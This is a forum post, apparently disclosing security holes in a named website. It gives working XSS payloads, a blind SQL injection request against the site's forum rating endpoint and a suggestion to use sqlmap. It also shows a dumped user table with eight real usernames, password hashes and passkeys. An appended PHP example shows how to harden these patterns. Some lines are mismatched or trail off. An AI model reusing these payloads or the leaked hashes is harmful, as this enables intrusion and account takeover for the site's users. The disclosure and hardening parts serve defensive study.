Security could also use some more work:
Code:
http://www.black-universe.li/recover.php | POST: email=TEST"><script>alert(String.fromCharCode(88,83,83));</script>
It is also possible to inject SQL commands!
Code:
https://www.black-universe.li/coverurl.php?form="><script>alert(String.fromCharCode(88,83,83));</script>
If the SQL query is valid, this message appears:
The whole thing can then be dumped automatically (preferably with sqlmap):
Code:
http://www.black-universe.li/forumstake.php?action=rate | POST: topicid=4&forumid=6&postid=(SELECT(CASE WHEN(ORD(MID((SELECT IFNULL(CAST(passhash AS CHAR ),0x20) FROM neu.users ORDER BY id LIMIT 0,1),32,1))NOT BETWEEN 0 AND 51)THEN 1 ELSE 1*(SELECT 1 FROM INFORMATION_SCHEMA.PLUGINS)END))&userid=31&returnto=forums.php?action=viewtopic&topicid=4&page=p4#p4&rating=3
Code:
Database: neu
Table: users
[8 entries]
+----+-----------------+----------------------------------+-------------------------+
| id | username        | passhash                         | passkey                 |
+----+-----------------+----------------------------------+-------------------------+
| 1  | D@rk-Ripper\x99 | ca59f625d7c9fbd505f3f069e922f054 | Û\x95ÉIzwxú             |
| 24 | Loyd            | 7e1734c6a4dcf3534f115b98a89f655d | íÛÃ\x8dâ3\r\x89         |
| 25 | Warlock         | 2858ec3ddc45c1c3cdb35c06c3c8a32f | #MöÛ3\x1fW¹             |
| 26 | sumfl0w         | 462ccbef5dc0734dada6806e739730cb | à¸\x92\x83\x15\x1dý\x95 |
| 27 | BabyRay         | 3d66eaf3ec5b8bb9f3dd145c1acc6793 | i:½qI\x8dgý             |
| 28 | ThaPUSHer       | 93b91d70047a5e48fc15427b41f83aae | ÕÛ\x16ß_Ä.m             |
| 29 | hddude          | ae35c2f5600ea1643d6ae20c4533c0df | ÁÁmô\x7fvM\x05          |
| 31 | user123         | 36f561c263e02d142667f451871a34aa | ¡k/2{<P©                |
+----+-----------------+----------------------------------+-------------------------+
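For comparison, here is how the two request-handling patterns the post points at (a submitted parameter echoed back into HTML, and a request parameter used inside a SQL query) look once they are hardened. This is an added example, not code from the original post or from the site in question; the `posts` table, its `rating` column, the PDO connection details and the function names are assumptions, while the parameter names (`email`, `postid`, `rating`) and the database name `neu` are taken from the requests quoted above.

```php
<?php
// Added example, not the original site's code. Assumes a MySQL database
// reachable through PDO and a table `posts` with an integer `rating` column.

// --- Reflected output: recover.php echoed the submitted email into the page.
// Vulnerable pattern (illustration only, do not use):
//   echo '<input name="email" value="' . $_POST['email'] . '">';
// Hardened: encode for the HTML attribute context before emitting, so a
// value such as  TEST"><script>...  is rendered as text, not as markup.
function renderEmailField(string $email): string
{
    $safe = htmlspecialchars($email, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="email" name="email" value="' . $safe . '">';
}

// --- Database access: forumstake.php?action=rate built SQL from postid.
// Vulnerable pattern (illustration only, do not use):
//   $db->query("UPDATE posts SET rating = rating + $rating WHERE id = " . $_POST['postid']);
// Hardened: enforce the expected type first, then bind the values through a
// prepared statement so a subquery in postid can never reach the parser.
function ratePost(PDO $db, $postid, $rating): bool
{
    $postid = filter_var($postid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    $rating = filter_var($rating, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1, 'max_range' => 5]]);
    if ($postid === false || $rating === false) {
        // Anything that is not a plain integer in range is rejected outright.
        return false;
    }
    $stmt = $db->prepare('UPDATE posts SET rating = rating + :rating WHERE id = :id');
    $stmt->bindValue(':rating', $rating, PDO::PARAM_INT);
    $stmt->bindValue(':id', $postid, PDO::PARAM_INT);
    return $stmt->execute();
}

// Connection with emulated prepares disabled, so MySQL itself binds the
// parameters server-side; credentials here are placeholders.
function connect(): PDO
{
    return new PDO('mysql:host=localhost;dbname=neu;charset=utf8mb4', 'DB_USER', 'DB_PASSWORD', [
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]);
}

// Usage in the rating endpoint:
//   $ok = ratePost(connect(), $_POST['postid'] ?? '', $_POST['rating'] ?? '');
//   if (!$ok) { http_response_code(400); exit; }
```

Two details are worth noting. `filter_var` with `FILTER_VALIDATE_INT` returns `false` for the boolean-blind payload above (it is not an integer), so the request is refused before any query is built; and even if a value did get through, it is bound as `PDO::PARAM_INT`, never concatenated into the statement text. The same discipline applies to every other parameter in that request (`topicid`, `forumid`, `userid`), which the example does not repeat.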